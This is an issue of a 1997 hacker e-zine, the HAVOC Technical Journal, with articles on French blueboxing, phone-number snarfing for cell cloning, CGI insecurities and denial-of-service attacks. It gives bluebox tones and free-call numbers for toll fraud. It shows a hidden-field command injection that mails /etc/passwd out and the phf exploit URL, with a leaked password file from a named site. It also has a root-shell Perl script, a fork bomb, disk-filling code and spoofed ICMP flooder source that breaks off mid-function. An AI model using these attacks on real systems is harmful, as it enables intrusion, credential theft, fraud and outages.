Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 08
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
Vol. 1 | No.8 | March 1st, 1997 | A HAVOC Bell Systems Publication
HBS: "we're ereet"
_____________________________________________________________________________
Inside this issue:
Whats new this issue..............................
Editorial.........................................Scud-O
Blue Boxing in France Pt. II......................memor
Fiber Optics......................................Keystroke
evilempire.org....................................Scud-O
Snarfing..........................................FuScAT
CGI Insecurities Part III.........................Scud-O
Denial Of Service Attacks.........................Scud-O
The 'g0d' Project.................................Scud-O
RTFM: UNIX Basics.................................
HBS...............................................
Next Month........................................
----------------------------------------------------
evilempire.org - the future of hbs - comming soon!
----------------------------------------------------
___________________________________________________________________
Editorial by Scud-O
First off, I want to apologize for the poor quality of issue 7.
I was worried that it would not be 100k, so I added some crap, and I know
that I shouldn't have. This is NOT what you have or should come to expect from
HBS and The HAVOC Technical Journal in particular.
Anyway, next month KungFuFox is going to guest edit, and Keystroke and
disc0re will help him collect articles and distribute them. I am going to
be ram-rodding thtj down everyone's throat, and getting more and more people
to read thtj.
This break will from editing will allow me to get back on track with
school, and focus more so that I can write better articles. Issue 8 has gone
fairly well, I am proud of it, and I think it is one of our greatest yet.
However, only a few people contributed to it, so I have worked extra hard on
my articles, especially the Denial Of Service article, which I feel is
probably the best writing I've done so far. So read it and tell me what you
think. This issue may even tie or beat issue 6 as our best issue ever.
I'll be getting the web page fixed up, adding the files page,
getting linux installed on my computer again, getting the ISP ready, raising
funds for the ISP, getting my ICMP project done, and getting HBScript aka mIRC
HAVOC Bell Systems version 1.0 done. Hopefully somewhere in there I'll still
have time for a life and fun. geez... just saying it all makes me tired....
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ -of HAVOC Bell Systems- /--------/
"The eLiTe lammah!"
FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805
"You're Spiro Agnew and I'm the Dick you answer to."
- 'Boom' , Bloodhound Gang with Rob Van Winkle
___________________________________________________________________
French Phreaking & Blueboxing. By memor
1.1 *** French Phreakers Politics.
1.11 Teletel Network In France.
1.12 Warez Business & Phreaking.
1.2 *** Type Of Phone Numbers In France.
1.21 Local & National Highly Dangerous # Numbers.
1.22 0800 Dangerous Free # Numbers.
1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers.
1.24 1800 & Operators # Numbers.
I --- French Phreaking & Blueboxing.
1.1 *** French Phreakers Politics.
French phreaking scene is mostly using lame Calling Card (was using it
because now with the Cartes Pastelles (pastels cards)) , calling card
made by France Telecom it is hardest to fraud (361010) and law are now
really bad with Carders.. Credit or Calling. Blueboxing dude are not
searched by cops and/or France Telecom so that make us having some little
skills in Blueboxing.
1.11 Teletel Network In France.
Well first Use of bluebox was to come on the Teletel Network (explained
in bif.txt) that 3615 network is really expensive and slow (1200bds-v23)
so we had (when we were young) to use bluebox for connecting it and
staying on really long times (like how we are doing on irc now) , personnaly
i used that for connecting 3615 RTEL , a server which was talking about
computers, cracking and computers selling.
note: nua of RTEL is 020803506031801
France____]\/[__________Server RTEL.
city nammed rennes________|
Rtel is still alive, it uses videotex terminals (you can get it on
ftp.minitel.fr or ftp.ibp.fr) , and you must have a modem which knows
v23 (for USR sportster v23 is ATS34=8 ATZ)
1.12 Warez Business & Phreaking.
The paradox team (France) was using calling card for accessing somes BBS in
usa and downloading Super Ninterdo Games, PC and Amiga Warez.. but their
calling cards died, so they fastly learnt bluebox for making their business
living again.. they were bluboxin to usa for dlding games and selling it in
France.. they all got busted.
1.2 *** Type Of Phone Numbers In France.
1.21 Local & National Highly Dangerous # Numbers.
The local phone numbers, numbers that u must pay at the connection opening
(0.73FF ... 5$US=1FF) and after u have to pay a taxe/min like 0.23FF/min
so that phone are not really interesting for blueboxing because u still
pay something.. well maybe interesting for calling an another country
but for calling somewhere in france, thats not interesting at all, National
Phone numbers are same (0.73FF at connection opening) but after , you pay
more.
Well.. you want to bluebox on that phone number, ok you are a good phreaker,
you scan and u pass all the filters of the french system.. you find
frequencies like:
Freq1 : voice1:2700 voice2:2650 lenght:130ms delay:10ms
Freq2 : voice1:2570 voice2:2430 lenght:300ms delay:10ms
After , you redial in France for calling that hospital :
Dial_Seq:A0380293031C
local_]\/[___________________________Hospital Number of dijon
For calling Provence
Now france is divided in parts like
A01 <- Paris
A02 <- Province (East of France)
A03 <- South Of France / Province
Well you can call another country via or Routine Code
Dial_Seq:A001(USA PHONE NUMBER)C
A00 is for calling a foreign country
or via Dial_Seq:B01(USA PHONE NUMBER)C
B for an international call.
But well if a company or someone you bluebox on ask France Telecom
about a fraud, France telecom uses for his local/national phone numbers
a big loging (1 month loging for each phone number) which is written
Who Call <-> Who is Called <-> Lenght <-> Date / Times
11111111 - 222222222 - 3Hours - 25/12/96 / 00:00
22222222 - B01xblahxC - 2H59Mn - 25/12/96 / 00:01
11111111 is you so u can be located.. be careful.. numbers really
dangerous.
1.22 0800 Dangerous Free # Numbers.
0800 numbers are free phone numbers in france , same method for blueboxin
on like France local/national phone numbers , but same danger.
1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers.
That ones are more more interesting, because they are free phone numbers
but for calling anothers countries.. like calling KornFlex(USA) from
a 080090xxxx , with that ones, you can call... most of the countries like
Perou, Chili, USA, Canada(0800908026), UK, DE ,...
Well you can bluebox on it , but you must know the frequencies of the
countrie.
like for coloumbia:
Freq1:2600 Freq2:2550 lenght:150ms delay:10ms
Freq1:2400 Freq2:2350 lenght:300ms delay:10ms
dial in CCITT#5 ...
coloumbia in not really interesting , because you can only phone in local
coloumbia ... BxxxxC will sux... only AxxxxxC works if you dont try to
use a routine code, it will hang up to busy if you try that.
No logs on that numbers.
1.24 1800 & Operators # Numbers.
1800 numbers are free for calling foreign countries operators but i know
it is not logged , so its "safe" to blueboxe on it, i know some person which
do that (Dominicana Republic) from their home,We scanned Chili with
a friend at home, well the sure thing is that we are not busted and we did
that 1 month ago. Dominicana Republic died 5-6 months ago.
Now some numbers for Calling France Direct (A french operator)
for free from your countries:
Argentina 0033800999111 Australia 1800881330, 180055144(ccs)
Austria 022903033 Belgium 080010033, 080010330
Brasil 0008033 Canada 18003634033, 18004636226(ccs)
Chili 123003331 China 10833(big cities only)
Colombia(1)980330057 Colombia(2)980330010(ccs)
Korea 0090330, 003933 Denmark 80010033
Dom.Rep 18007510600 EAU 8001133
Finland 980010330 Gabon 00033
Germany 0130800033 Greece 008003311
Hawaii 18008653313 HK 8000033, 80003311(ccs)
Hungary 0080003311 Iceland 8009033
Indonesia 001801331 Ireland 1800551033, 1800550033(ccs)
Israel 1773302727 Italy 1720033
Japan(1) 0039331, 0031005533(ccs) Japan(2) 004422333333(ccs)
Lux. 08000033(ccs) Malaysia 8000033(ccs)
Morocco 002110033 M.i. 73331
Mexico 98800332001 Norway 80019933
New-Cal. 000933 New-Zel. 000933
UK(1) 0800890033 UK(2) 0500890033(ccs)
Spain 900990033 Sweden(1) 020799033
Sweden(2) 020799133(ccs) Uruguay 000433
USA(1) 18005372623, 18009372623
USA(2) 180047372623(ccs), 18008727835(ccs)
USA(3) 18007278350(ccs), 18002510841(ccs)
___________________________________________________________________
Fiber Optics by Keystroke
I explained the first main fiber optic project in my last article for HAVOC
(the TAT-8). Here, I will try to give you a brief overview of fiber optic
communications.
Fiber Optics Communications
Fiber Optics Communications or lightwave communications
A typical fiber optics communications system consists of three basic
components:
1. Optical Transmitter
2. Optical fiber
3. Optical Receiver
4. Havoc (Optional)
The transmission of information over a distance using optical fiber usually
requires several steps. First, the the info is converted into an electrical
signal (if it is not already in that form). Second, the electrical signal is
changed into an optical signal w/ the help of an optical source. Third, the
optical signal is transmitted through the optical fiber. Fourth, the optical
signal is detected and converted into an electrical signal with the help of
an optical detector. Finally, the signal processing is done.
Below are some more specific optical fibers, recivers, etc
Electrical Interface - Electrical Modulator, encoder, multiplexer, etc.
Optical transmitter - Led, laser diode optical fiber
- Monomode step index fiber, multimode step-index fiber,
multimode graded index fiber
Optical receiver - pin diode, apd, photo transistor, photo darlinton
electrical interface - electrical demodulator, decoder,
demultiplexer, etc.
Theoretically, an optical signal with a wavelength of 1 micrometer, a
bandwidth of 300 THz is possible. Presently, the maxium bandwidth is only
10 Gbps :p Monomode step index is best for long haul projects (less
transmission loss) while multimode is better for short haul (more loss, but
also more speed)
There are 3 types of optical fiber: Monomode step index fiber, multimode
step-index fiber, and multimode graded index fiber.
There are many benifits of fiber optic communication:
Large Bandwidth (explained above)
Small size and weight (tens of micrometers smaller than the diameter of a
human hair and MUCH smaller and lighter than copper (sic) cables)
Dielectric construction - No ground lops are required (no external
electromagnetic fields)
Low transmission loss - (monomode fibers loose .2 db/km multimode 1db/kb -
not many repeaters necessary)
EMI & RFI immunity - No cross talk because there is no generation of
electrical or electromagnetical noise or interfierence
Signal security - Optical fibers do not radiate energy. Can't be tapped in a
non-intrusive manner. (Military and banks use them)
High reliability and durability - cant corrode - cant oxidize - can be used
in explosive or nuclear enviroment
Now to compare optical sources
LED vs. Laser Diode
Spectral width Large 30-40 nm Narrow 1 - 2 nm
Modulation bandwidth 1 Gbps 6 -10 Gbps
Insertion loss 10 -15 db 3 db
Output power 1 -5 mW 5 - 15 mW
Life expectancy 100 million hours 1 million hours
Temperature Sensiviaty Tolerant Sensitive
Beam divergence Large Narrow
Cost Low High
Optical Detectors
PIN (P-type Intrinsic, N-type) APD
Sensitivity Low High
Cost Low High
Temp. Sensitiv. Tolerant Sensitive
Bias Voltage Low (10-50 V) High (100-300 V)
As you can see, fiber optic communication is far superior to what is in use
today in the majority of the world (copper wire).
- Keystroke
___________________________________________________________________
evilempire.org
--------------
evilempire.org login
HBS Unix 5.0 -=- linux kernel 1.3.20
User:
Password:
-------------------------------------
Imagine........
evilempire.org is to be the future of HBS, our up and coming ISP.
We are currently filing for the domain with InterNIC, and plan for Defraz to
run a simple vdomain for us until we get minos ( the ISP computer) built.
evilempire.org will start up with at least 2gb of space or so, and we will
expand as we need to, and as funds allow. we plan for the computer to be
co-located ( basically this means at an ISP's building, with a t1 connection)
but with a modem and a line to for my internet access, and possibly psych0's
if he pays me. We will be offering accounts for a low fee, which will help us
cover the cost of start up ( hopefully about only 1000$) and the monthly cost
of start up ( about 300$ a month). As we get more and more users, accounts
will get cheaper, as we will only be usng the money to pay for the monthly
fees and the costs to upgrade hardware, etc.
When we start, we will have 1gb of space for users, since about 1gb
will be used for linux and misc software, FTP files, newsgroups, etc. However,
if we can piggy back off of the ISP that will run us, we may use their
newsgroups and then offer more space to users.
We currently need at least 30 users to make this happen, so i am
offering the following, The first 35 to 40 people that sign up, i will give
you slashed prices on accounts when i have more people using the service, and
will make your accounts free if i make enough to cover for your accounts.
And, as i gain users, i will start to offer different accounts if
people say, only want to run a bot or two on the account, i will lower the
price.
As of 3-3-97 Our pricing plan:
----------------------------------------------------
$5/mo email + newsgroups
$10/mo full shell
$15/mo secured shell *
$5/mo bot account only
$10/yr for each 10mb after the quota limit
$15/yr FTP account **
* a secured account will offer more leanancy if you use the server
to run attacks on servers, etc. However, we WILL suspend your account
if you abuse IRC and i get e-mails that if you do not stop, they will
ban our domain. I AM NOT going to get evilempire.org banned from every
IRC server out there!!!
** The FTP accounts will assure that you can get the files you need,
since we plan to have a LARGE file collection, but only about 5
anonymous FTP's at a time. All shell accounts come with this.
All shells come with: CGI-BIN, all UNIX stuff, many IRC progs,
tons of DOS attackers, FTP access, mailbombers, allowed to run bots,
and about 20-50+ mb of space!
-------------------------------------------------------------------
We plan to get the server up be June or July, so send in the money soon if you
want a premium account! E-mail me at: FoxMulder@worldnet.att.net for more
information, and since our PO Box is not up yet.
evilempire.org
PO Box XXXX
Sykesville, MD 21784
heh
computers:
limbo: (current computer)
486/66 ( was a 50, pushed to 66)
8 mb ram
245 md ide hd
1 gb scsi hd
2x cd-rom
28.8 modem
minos: ( future computer at co-location)
486/100
16mb ram
2 gb ide hd
probably no cd drive
28.8 modem (maybe)
10mbps ethernet card
connected to t1 line
lucifer(?) ( future computer at my house)
pentimum 200 (mmx?)
32-64mb ram
2-9gb hd ( ide or scsi)
8x-12x cd-rom
28.8 modem
10mbps ethernet (and another for limbo)
( after the site us up and we have money, we will uprade to probably a
pentium 200 Pro or so, with 64-128 mb ram, several gigs hd, SCSI to support
the hard drives, etc. Then maybe some day i will get a t1 right into the
server and run ti at my house! (not likely) )
___________________________________________________________________
Gettin the Digits by FuScAT
(*** ed note: although this article does not go as indepth as i had hoped, it
none the less give you a good over view of 'snarfing' ***)
Basically we are dealing with the concern of obtaining Electronic Serial Numbers (ESNs)
and Mobile Identification Numbers (MINs) for reprogramming cellular fones. Really
there are about three basic ways to go about doing this that I am currently aware of. If you Know of any other please let me know about them.
First:
Social Engineering
You could call up your cell provider and ask for a service man to come
take a look at your fone. They will give you a name and say he will be there
shortly. Then about 10 minutes later call the provider back pretending to be
the service man they just sent out, and with the proper jargon and know how
you can squeeze the info out of them. Really not very affective and frankly
probably more of a waste of time...
Second:
A CellScope
Its a fairly simple few pieces of hardware and software consisting of
a cellfone, a palmtop pc(or laptop), the proper software, and an antenna.
Basically the cellfone is used to scan the channels and frequencies of the
cell sites, when a number in use is displayed on the screen from the software
you can lock in on it and the warez will snag the ESN & MIN for you leaving it
in plain english for you to use..VERY PRACTICAL but highly unaffordable.
(unfortunately cus Im sure we would ALL love to have one), and oh yea only
usable by law enforcement agencies or private detectives...(grin)
Finally
Modified Scanner
There is a way to modify a handheld police scanner to do virtually the
same thing the CellScopes cellfone does. You can make a few (quiet a few)
modifications to your scanner to make it scan the cellular frequencies. Now
you will also need the hardware for this, being the connector cable you will
need to connect your scanner to your pc or laptop. Then with the the right
software and the know how you will be able to snag ESNs & MINs
If I am mistaken in any way PLEASE correct me...and if anyone knows of other
ways to get the digits please let us know...
--FuScAT
___________________________________________________________________
CGI Insecurities Part III.........................Scud-O
----------------
NOTE: HBS brings it to you first! We started on CGI weaknesses in October,
phrack brought CGI weaknesses in December! (sorry, just had to gloat a
little!)
----------------
Well, this is the final chapter in my three part series of CGI
Insecurities, and this will probably be the most useful parts of the whole
series, since you can use these holes in scripts that are out there running.
This part of the article covers many topics, but it also focuses mostly on
shell escapes. Many cgi ( especially perl scripts) use calls to unix commands
(mostly sendmail or mail) to get simple serivces done.
Shell escapes:
Many, many,many CGI scripts are vunerable, since they use mail, or
even sendmail <gasp> (what the hell is wrong with those CGI scripters? dont
they know that sendmail has holes?). Using for example ~ or other shell
escape codes, it is possible to get a shell on the remote systems to cause
heh, HAVOC!
Sendmail is also a BIG hole here, since sendmail holes can be cracked
and exploited by the CGI program.
system() :
Another big weakness is the gold old system call, which i presented in
issue 6 (however that was for c, but the basics are the same). If you find a
system(), or even an exec() call, you can modify the html document by, if
you use nutcrape (im not covering IE, since it is the devil!) by clicking,
view, then document source, then change the CGI to system("command_to_run") ,
(command_to_run of coursing being the comand you want to use) save the file,
relaod nutscrape, and use it. Depending on how the CGI is coded, you might
need to add the sites address here and there, but i will leave that to you.
<input> fun:
Another way to get the password file, is similar to the file i did
way back in issue 4, but this is a hidden input tag ( normally used to store
information from page to page, much like 'cookies' do) which sends you an
email with the passwords.
ex:
<input type="hidden" name="mail_to"
value="info@site.com; mail you@your-isp.com < /etc/passwd">
This then, sends you the password file.
phf:
-----------
This bug is pretty common knowledge now, but basically, you enter the
following:
http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This then returns to you, a copy of the password file. If you dont
believe me, that something like that could be so simple, try
perrier.com . I got this when i tried:
--------------------------------------------------------------
<H1>Query Results</H1>
<P>
/usr/local/bin/ph -m alias=X
/bin/cat /etc/passwd
<PRE>
root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:2:uucp adminstrative account:/usr/lib/uucp:
auth:*:6:11:Authentication Subsystem:/tcb/bin:
cron:*:7:14:Cron Subsystem:/usr/adm/cron:
lp:*:8:12:Line Printer Subsystem:/users/lp:
tcb:*:9:18:Trusted Computing Base:/tcb:
adm:*:10:19:Administration Subsystem:/usr/adm:
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
locker:Nologin:12:15:locker:/usr/users/locker:/bin/sh
per-surv:Nologin:204:1:Perrier Survey Email address:/opt/per-surv:/bin/csh
calvert:Nologin:205:1:Calvert Deforest Email address:/opt/calvert:/bin/false
thebrains:Nologin:206:1:jrap Email address:/opt/jrap:/bin/false
jrap-surv:Nologin:207:1:jrap survey addr:/opt/jrap:/bin/csh
footlocker:Nologin:208:1:footlocker survey:/opt/footlocker:/bin/csh
ftp:*:500:25:Anonymous FTP user:/data/web/public/ftp:/bin/false
eds:RbaQ09DoC7MXg:501:26:EDS FTP user:/data/clients/eds:/bin/false
unprod:mD8.fz9LD.Tw6:210:32:unproductions FTP user:/data/web/public/calvert:/bin/false
bardhl:pm59ch9LkeaqY:211:33:Bardahl FTP User:/data/web/public/bardahl:/bin/false
</PRE>
----------------------------------------------------------------------------
Pretty slick no?
Anyway, have fun cracking their passwords.....
one last thing....
--------------------------
exploit.pl
This script while only 4 lines of code, gives you (or who ever runs
this script) a shell to do, well what ever you please.
#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
----------------------------------
I want to thanks all of you for reading this, and I want to give thanks
for the knowledge of CGI and its weaknesses, and thanks to memor for telling
me to try out phf on perrier.com....
Scud-O
___________________________________________________________________
[The Modern Guide to Denial of Service Attacks]
History and Modern Uses by Scud-O
Denial of Service (DOS) Attacks are nothing new. Many old
versions of UNIX would crash with this little bit of code if an
administrator did not see all the processes running.
main()
{
while(1)
fork();
}
I remember crashing a few systems with this little prog, and a system will go
down fast if this is not seen by an admin. Basically this program spawns ( or
forks) another process of it self which then spawns more, and so on. This is a
total attack since all of the chold processes are waiting for new processes
to be established, so even if you kill one process, another will take its
place.
However, most current versions of UNIX are immune to this attack since
users are limited to a maximum number of processes (except root). Most UNIX
versions have the max number of processed buitl into the kernel, but Solaris
for example lets the value ( MAXUPROC) be set at boot time, in etc/system
under set maxuproc=100 (or whatever the sysadmin has set it to be). However,
if you have several accounts on a system, or have some friends with accounts,
you all can take down the system by running the program.
Having too many processes is a great challenge for sysadmins to fix
without having to reboot the system, since:
a) You can not run ps to determine what process numbers to kill, and
b) if you are not logged in as super user, yuo cannot use su or login
because both of these functions require the creation of a process,
which, if you system is overloaded, is impossible.
However, most sysadmins do not want to shut down their system by just
flicking off the power, since virtually no systems are designed to undergo a
fast, orderly shutdown when quickly powered off. And sysadmins know that
hitting the power is not good for the disk, since it may lose disk blocks, and
it will not flush the buffers to disk, thus losing any unsaved work. So admins
are left to randomly killing processes, or if their system supports it, doing
a kill -TERM -1 , which sends a SIGTERM to all processes except superuser
processes and system processes.
________________
Disk Attacks:
Another old method of attack is the old disk attacks, such as filling
up the hard disk, or tree-structures, bot presented below.
Hidden Space:
This is a form of attack that will work very well as long as
the computer it is on is run 24 hours a day. Basically the sample bit of code
below creates and keeps a file open, thus making it invisible to du or find,
yet still takeing up space. This is due to the fact that unlinked files are
not in the directory tree, yet they still take up space.
filename: fillup.c
#include <stdio.h>
#include <stdlib.h>
main()
{
int ifd;
chat buf[8192];
ifd= open("./attack", O_WRITE| O_CREAT, 0777);
unlink("/.attack");
while(1)
write(ifd,buf, sizeof9buf));
}
This little program, after creating the file, runs an infinite loop,
which continues to fill up disk space, and stops anything from being worked on
since the disk will be filled up. Try using a ls or du to see the file and it
will not be there, causing the sysadmin some confusion. That is unless they
have a copy of lsof on hand, or they kill the process or all processes. Now
to make this go faster, always run this in the background, and then run a few
more copies just for good measure.
* HINT: one way to get this to work faster, is to add a fork() call in the
program, thus making it run multiple copies, and filling up the drive faster.
-----------------
Tree-scructure attacks
These are actually quite lame and weak, but they can still cause some
problems, since a tree could be made that is too deep to be deleted by rm.
(HINT: for a very good attack, combine this and the attack up above, to make
a huge directory with huge files!)
a sample shell script that makes these directories and fills them up is below:
$!/bin/ksh
$
$ Dont try this at home, unless you are quite foolish!
while mkdir anotherdir
do
cd ./anotherdir
cp /bin/cc fillup
done
On many systems rm- r just cannot delete trees this big, since they can
overflow buffers or limits on the number of filenames or open directories
at one time. using chdir you can delete them manually, but this is quite
boring so most admins would just write a script to do this. (e-mail me if you
need the script)
------------
/tmp
On many UNIX systems out there today, both users and programs can
create files of unlimited size in the /tmp directory for temporary usage.
Now, you can simply about this vunerability by using the fillup.c or tree
structure progs above and fill up the /tmp dir and conscequentally fill up
the entire disk.
------------------
Network Attacks:
------------------
Okay, you are proably saying, hey great, i have these methods to
attack a local system i have an account on, but what about remote systems that
i may not have an account on? well, thanks to daemon9 and other coders out
there, there is an abundancy of remote DOS attacks.
We are also lucky, to date no firewall really protects from a DOS
attack, but watch that change soon. With all the hype and press about DOS
atacks on ISPs, firewalls will soon be able to block DOS.
For daemon9's article on TCP/SYN flooding, either
a) goto http://www.geocities.com/SiliconValley/8805/files.html
and scroll down to 'phrack' and click on issue 48
b) goto http://freeside.com/phrack.html and scroll down
to past issues and get issue 48
c) or ftp.fc.net/pub/phrack/ and get phrack 48
You will want article 13 which is Project Neptune by daemon9.
daemon9 gives a great indepth analisys of TCP/SYN flooding and
offers a great C program to attack systems.
Now the basic info on TCP/SYN flooding presented here is nowhere near as
informative as daemon9's since i have not spend as much time on it as he has.
What is below is a very simple explaination of the basic if the flood.
First, we need to see a simple connection. TCP uses a 3 way hand shake
to start up a conversation. ex:
A B
---------> SYN
<--------- SYN/ACK
---------> ACK
Now if A is the client computer and B is the host, A sends a SYN to
B, and B replies with a SYN/ACK , This tells the client that the server
acknologizes the connection and then the client replies with an ACK, which
says that it acknologizes the connection as well, and the connection is made.
While a SYN is waiting to be processed, it sits in a backlog queue,
waiting for the host to see it. Here is where the flood comes in. Since UNIX
creates a backlog to prevent several SYNs filling up the memory ( which would
make our job so much faster), we must fill up the queue.
If you use a general IP Spoofer, (or the code in phrack 48) you can
use it to make your connection appear to be coming from the spoofed IP, which
MUST be unreachable so it cannot send a RST command. Basically, the client
sends a SYN to the host, the host tries to reply, but it sends it to the
spoofed IP, and since the IP will not respond, it will continue trying to
make a connection, until it times out. So if you run several SYNs to a hosts
port that you want to block, you can quickly fill up the queue, making the
port dead, since it can handle no more connections.
For code that does this, see phrack 48.
--------------------
SMTP floods:
--------------------
These are very simple to do, since STMP will pretty much accept just
about anything that comes their way. I did a simple mailbomber in issue 7, so
use that to mailbomb a server, try common accounts like postmaster@site
or info@site, etc, and send the system either several VERY large files to
fill up disk space, or many,many small mails to flood the STMP server with
e-mails, and thus making it unusable.
-----------------------------
ICMP_ECHO floods:
-----------------------------
These attacks are some of the most common, since they are often used
by IRC users to 'kill' other users, and thus many people i know are getting
k-lines and nasty messages from sysadmins who are pissed that someone from
undernet or another irc server has e-mailed them about you.
Anyway, below is some sample code that Keystroke had, and although he will
be pissed that i am adding it here, i am, so tough shit Key! (heh) This code
may also be the basis of my ICMP killer win95 program i will be developing
during the coming months, ( wish me luck on porting this from UNIX to Win95)
Basically tthe following code works, since UNIX systems will reply to
ICMP requests continually, not realizing that it may be halting the system by
replying to what the system thinks are simple ICMPs. Now adding an IP spoofer
to this setup, only makes things better since the computer will time out while
trying to get a reply from these ECHOs while new ECHOs are also hitting the
system, thus totally killing the system.
-------------------------------------------
/*
* echok.c
* ICMP_ECHO Killer
*
* Author: Zakath Credits: LOTSA thanks to crisk
* Don't be fooled. Very little is my orig code.
* [03.13.96]
*/
#define RESOLVE_QUIET
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#define ECHOK_VER "1.4"
/* GENERAL ROUTINES ------------------------------------------- */
void banner(void)
{
printf("\n * ICMP ECHO Killer [v%s] - by Zakath *", ECHOK_VER);
printf("\n * Code based on works by Crisk & Mike Muuss *\n\n");
}
void usage(const char *progname)
{
printf("\nusage:\n ");
printf("%s [-f <-n number>] [-s packet size] [-w wait] <spoof> <dest>\n\n",progname);
printf("\t-f : enable flooding (ping -f)\n");
printf("\t-n <number> : number of pings to send\n");
printf("\t-s <size> : ICMP_ECHO Packet Size [Default is 64]\n");
printf("\t-w <time> : Wait time between packets [Default is 100]\n");
printf("\t<spoof> : address of fake ICMP packet sender\n");
printf("\t<dest> : destination of the flood message\n");
printf("\n");
}
/* OPTION PARSING -------------------------------------------- */
unsigned char *dest_name;
unsigned char *spoof_name = NULL;
struct sockaddr_in destaddr, spoofaddr;
unsigned long dest_addr;
unsigned long spoof_addr;
unsigned pingsize, pingsleep, pingnmbr;
char flood = 0;
int x = 1;
/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
/* Nice resolve func. by crisk */
int resolve( const char *name, struct sockaddr_in *addr, int port )
{
struct hostent *host;
/* clear everything in case I forget something */
bzero((char *)addr,sizeof(struct sockaddr_in));
if (( host = gethostbyname(name) ) == NULL ) {
#ifndef RESOLVE_QUIET
fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
perror("");
#endif
return -1;
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
addr->sin_port = htons(port);
return 0;
}
unsigned long addr_to_ulong(struct sockaddr_in *addr)
{
return addr->sin_addr.s_addr;
}
int resolve_one(const char *name, unsigned long *addr, const char *desc)
{
struct sockaddr_in tempaddr;
if (resolve(name, &tempaddr,0) == -1) {
printf("error: can't resolve the %s.\n",desc);
return -1;
}
*addr = tempaddr.sin_addr.s_addr;
return 0;
}
int resolve_all(const char *dest,
const char *spoof)
{
if (resolve_one(dest,&dest_addr,"dest address")) return -1;
if (spoof!=NULL)
if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;
spoofaddr.sin_addr.s_addr = spoof_addr;
spoofaddr.sin_family = AF_INET;
destaddr.sin_addr.s_addr = dest_addr;
destaddr.sin_family = AF_INET;
}
void give_info(void)
{
printf("# target address : %s (%s)\n",dest_name,inet_ntoa(dest_addr));
printf("# spoof-from address : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr));
if (pingnmbr) printf("# number of packets : %u\n",(pingnmbr));
printf("# icmp echo packet size : %u\n",(pingsize+36));
printf("# wait time between send : %u\n\n", pingsleep);
}
int parse_args(int argc, char *argv[])
{
int opt;
char *endptr;
while ((opt=getopt(argc, argv, "fn:s:w:")) != -1) {
switch(opt) {
case 'f': flood = 1; break;
case 'n': pingnmbr = strtoul(optarg,&endptr,10);
if (*endptr != '\0') {
printf("%s: Invalid Number '%s'.\n", argv[0], optarg);
return -1;
}
break;
case 's': pingsize = strtoul(optarg,&endptr,10);
if (*endptr != '\0') {
printf("%s: Bad Packet Size '%s'\n", argv[0], optarg);
return -1;
}
break;
case 'w': pingsleep = strtoul(optarg,&endptr,10);
if (*endptr != '\0') {
printf("%s: Bad Wait Time '%s'\n", argv[0], optarg);
return -1;
}
break;
case '?':
case ':': return -1; break;
}
}
if (optind > argc-2) {
printf("%s: missing parameters\n",argv[0]);
return -1;
}
if (!pingsize)
pingsize = 28;
else
pingsize = pingsize - 36 ;
if (!pingsleep)
pingsleep = 100;
spoof_name = argv[optind++];
dest_name = argv[optind++];
return 0;
}
/*
* icmp_echo_send()
* builds and sends an ICMP unreachable packet. Since ICMP unreachable packets
* contain the IP header + 64 bits of original datagram, we create a bogus
* IP header and the first 64 bits of a TCP header (ports and syn).
*
*/
inline int icmp_echo_send(int socket,
unsigned long spoof_addr,
unsigned long t_addr,
unsigned pingsize)
{
unsigned char packet[5122];
struct iphdr *ip;
struct icmphdr *icmp;
struct iphdr *origip;
unsigned char *data;
int i;
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet+IPHDRSIZE);
origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);
